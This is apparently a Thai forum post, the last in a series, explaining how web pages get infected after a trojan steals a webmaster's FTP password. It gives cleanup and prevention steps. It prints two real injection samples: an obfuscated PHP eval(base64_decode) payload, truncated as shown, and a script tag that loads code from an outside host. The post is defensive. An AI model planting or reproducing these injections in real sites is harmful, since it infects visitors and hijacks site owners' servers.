ไวรัสที่ติดเข้าเว็บ มาจากไหน? (ตอนที่ 3-เซียงเหล่งนึ่งฯ-จบ)

ตอนนี้มีมาอีกแบบ ไม่ใช่ iframe แล้ว  

โค๊ดประมาณนี้

โค๊ด:

eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJndycpKXtmdW5jdGlvbiB4cmd3KCRzKX
tpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1
hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD
8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7a
WYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8f
CgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdf
bWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14 XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk I2lzJywkcywkYSkpZ
?php

ถ้าเป็น เอชทีเอมแอล ในโฮสต์เดียวกันก็จะติด

โค๊ด:

<script src=http://forums.indianmoneyplus.com/cgi-bin/profile-edit.php ></script>

ปัญหาเพราะเครื่องพีซีที่ใช้ทำเว็บ ติดไวรัสหรือโทรจันชนิดนี้  
พอใช้เครื่องต่อ เอฟทีพี ปุ๊บ  ก็จะถูกแคปรหัสผ่านเอฟทีพีทันที  
แล้วส่งกลับให้เซิฟเวอรืของโทรจันนั้น   จากนั้นก็จะแทรกสคริป แล้วอัพไฟล์มาทับของเรา 
รวมถึงทำให้เปร์มิสชั่นเพี้ยนไปด้วย  

วิธีแก้  
1. ลบ หรือแก้พาสเวิดเอฟทีพี 
2. ฟอร์แมตพีซีตัวปัญหา  (ต้องหาเองเองว่าเป็นของใคร ในกรณีแอดมินหลายคน) 
    ต้องฟอแม็ตเพราะมันคงฝังตัวจนแอนติไวรัสของเครื่องไม่สามารถจัดการได้ 
3. ฟลังจากฟอแม็ตเครื่อง ต่อเอฟทีพีใหม่ แล้วไล่แก้โค๊ดไวรัสออกให้หมด  
4. เปอมิสชั่นไฟล์ 644  โฟลเดอร์ 755

วิธีป้องกัน  
1. เครื่องที่ใช้ทำเว็บ   ให้ใช้ ไออี8 โครม หรือหมาย่าง  (ไออี6 ห้ามเด็ดขาด) 
2. ถ้าเป็นเอ็กพี เป็นไปได้ให้ใช้  แพ็ค3  


ถ้ามี Webmaster หลายคน และใช้ FTP เดียวกัน นั่นแหละไวรัสมาจากคนใดคนหนึ่ง

ใช้ Google Webmaster Tools ช่วยหาไวรัส และแจ้งยกเลิกว่ามีไวรัส